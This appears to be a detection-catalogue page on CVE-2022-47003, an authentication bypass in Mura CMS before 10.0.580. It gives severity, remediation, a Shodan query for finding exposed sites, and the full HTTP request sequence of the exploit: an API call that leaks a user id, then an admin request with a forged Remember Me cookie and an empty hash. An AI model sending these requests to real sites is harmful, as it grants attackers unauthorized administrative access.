🔙 목록으로 돌아가기

CVE-2022-47003: Mura CMS <10.0.580 - Authentication Bypass

TitleMura CMS <10.0.580 - Authentication Bypass
Authoriamnoooob,rootxharsh,pdresearch
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Mura CMS application.
RemediationUpgrade Mura CMS to version 10.0.580 or later to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.30275
CVE IDCVE-2022-47003
CWE IDCWE-863
Shodan QueryGenerator: Mura CMSgenerator: mura cms
Tags cve cve2022 auth-bypass cms mura murasoftware vuln

🔍 Vulnerability Description

Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0
Connection: close
Accept-Encoding: gzip
GET /index.cfm/_api/json/v1/Pg5D55/content/?fields=lastupdatebyid HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.6
Connection: close
Accept-Encoding: gzip
GET /admin/?muraAction=cEditProfile.edit HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Cookie: userid=GU8ESD; userhash=
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-47003.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-47003.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A